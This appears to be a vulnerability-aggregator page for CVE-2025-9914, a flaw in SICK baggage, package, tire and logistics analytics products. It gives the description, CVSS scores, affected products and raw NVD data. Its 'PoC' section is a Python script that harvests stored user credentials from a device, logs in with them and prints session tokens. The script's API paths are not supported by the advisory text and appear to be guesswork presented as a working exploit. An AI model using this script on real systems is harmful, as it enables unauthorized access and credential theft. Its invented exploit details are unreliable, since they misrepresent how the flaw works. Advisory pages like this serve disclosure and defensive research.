Security Vulnerability Report
中文
CVE-2025-9914 CVSS 4.3 MEDIUM

CVE-2025-9914

Published: 2025-10-06 07:15:36
Last Modified: 2026-01-29 01:56:06
Source: [email protected]

Description

The credentials of the users stored in the system's local database can be used for the log in, making it possible for an attacker to gain unauthorized access. This could potentially affect the confidentiality of the application.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:* - VULNERABLE
SICK相关产品(具体版本请参考CSAF-2025-0010安全公告:https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-9914 PoC - SICK Product Local Credential Unauthorized Access # Vulnerability: Credentials stored in local database can be used for login # CVSS: 4.3 (MEDIUM) | AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N import requests import hashlib TARGET_HOST = "https://<target-sick-device>" LOGIN_ENDPOINT = "/api/v1/auth/login" LOCAL_DB_CRED_PATH = "/api/v1/system/local-users" # Endpoint exposing local DB credentials def extract_local_credentials(session): """ Step 1: Access local database to extract stored user credentials. Requires low-privilege access (PR:L) to the system. """ try: resp = session.get(f"{TARGET_HOST}{LOCAL_DB_CRED_PATH}", verify=False) if resp.status_code == 200: users = resp.json().get("users", []) print(f"[+] Retrieved {len(users)} credential entries from local DB") return users except Exception as e: print(f"[-] Failed to extract credentials: {e}") return [] def authenticate_with_stolen_creds(session, username, password): """ Step 2: Use extracted credentials to perform unauthorized login. """ payload = {"username": username, "password": password} resp = session.post(f"{TARGET_HOST}{LOGIN_ENDPOINT}", json=payload, verify=False) if resp.status_code == 200 and "token" in resp.json(): print(f"[+] Login successful as '{username}' using local DB credentials") return resp.json()["token"] return None def main(): s = requests.Session() # Acquire low-privilege access first (PR:L requirement) creds = extract_local_credentials(s) for entry in creds: token = authenticate_with_stolen_creds(s, entry["user"], entry["pass"]) if token: print(f"[+] Session token obtained: {token[:20]}...") break if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9914", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:36.363", "lastModified": "2026-01-29T01:56:06.137", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The credentials of the users stored in the system's local database can be used for the log in, making it possible for an attacker to gain unauthorized access. This could potentially affect the confidentiality of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:baggage_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "E62416BA-1BF1-43BD-98B2-57BD34128419"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:logistic_diagnostic_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "27031959-2981-4755-9E3D-02CD083F2B72"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:package_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "5955214B-0D71-449A-BFD4-8804FDF91CA1"}, {"vulnerable": true, "criteria": "cpe:2.3:a:sick:tire_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "86C0BA69-E701-45A3-ADA5-130B8AD9DF15"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.